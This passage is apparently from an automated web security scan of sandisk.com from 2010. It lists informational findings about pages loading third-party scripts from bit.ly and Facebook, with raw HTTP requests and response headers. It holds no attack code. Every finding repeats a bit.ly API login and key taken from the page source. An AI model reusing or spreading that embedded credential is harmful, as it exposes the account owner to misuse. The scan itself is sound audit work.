<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.41. http://www.sandisk.com/about-sandisk/management/timeline-of-innovation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/management/timeline-of-innovation

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/management/timeline-of-innovation HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/management
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22484
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.42. http://www.sandisk.com/about-sandisk/media-kit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/media-kit HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20396
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.43. http://www.sandisk.com/about-sandisk/media-kit/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/media-kit/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-04-sandisk-to-celebrate-15-years-on-the-nasdaq-with--opening-bell-ceremony
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20397
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.44. http://www.sandisk.com/about-sandisk/media-kit/business-and-industry-association-links previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/business-and-industry-association-links

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/media-kit/business-and-industry-association-links HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22019
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.45. http://www.sandisk.com/about-sandisk/media-kit/businessoem-products-brochures previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/businessoem-products-brochures

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /about-sandisk/media-kit/businessoem-products-brochures HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28370
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.46. http://www.sandisk.com/about-sandisk/media-kit/executive-officer-photos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/executive-officer-photos

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /about-sandisk/media-kit/executive-officer-photos HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25576
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.47. http://www.sandisk.com/about-sandisk/media-kit/executive-officer-photos.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/executive-officer-photos.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /about-sandisk/media-kit/executive-officer-photos.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25581
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.48. http://www.sandisk.com/about-sandisk/media-kit/miscellaneous previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/miscellaneous

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /about-sandisk/media-kit/miscellaneous HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15491
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.49. http://www.sandisk.com/about-sandisk/media-kit/oem-product-photos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/oem-product-photos

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/media-kit/oem-product-photos HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26475
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.50. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/retail-product-photos

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/media-kit/retail-product-photos HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42995
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.51. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/retail-product-photos/

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/media-kit/retail-product-photos/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42996
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.52. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos/dslr/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/retail-product-photos/dslr/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /about-sandisk/media-kit/retail-product-photos/dslr/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23167
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.53. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos/dslr/sandisk-extreme-pro-compactflash-card.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/retail-product-photos/dslr/sandisk-extreme-pro-compactflash-card.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /about-sandisk/media-kit/retail-product-photos/dslr/sandisk-extreme-pro-compactflash-card.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17531
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.54. http://www.sandisk.com/about-sandisk/media-kit/retail-products-brochures previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/retail-products-brochures

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /about-sandisk/media-kit/retail-products-brochures HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53527
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.55. http://www.sandisk.com/about-sandisk/media-kit/trademark-information previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/media-kit/trademark-information

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/media-kit/trademark-information HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21811
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.56. http://www.sandisk.com/about-sandisk/press-room previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/press-room

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/press-room HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43181
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div class="floatLeft">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.57. http://www.sandisk.com/about-sandisk/press-room/press-contacts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/press-room/press-contacts

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /about-sandisk/press-room/press-contacts HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

2.58. http://www.sandisk.com/about-sandisk/press-room/press-releases previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/press-room/press-releases

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /about-sandisk/press-room/press-releases HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49376
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/about-sandisk/press-room/press-releases/2009/2009-09-14-sandisk-extreme-pro-compactflash-memory-card-raises-bar-for-professional-grade-performance,-capacity-and-reliability

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

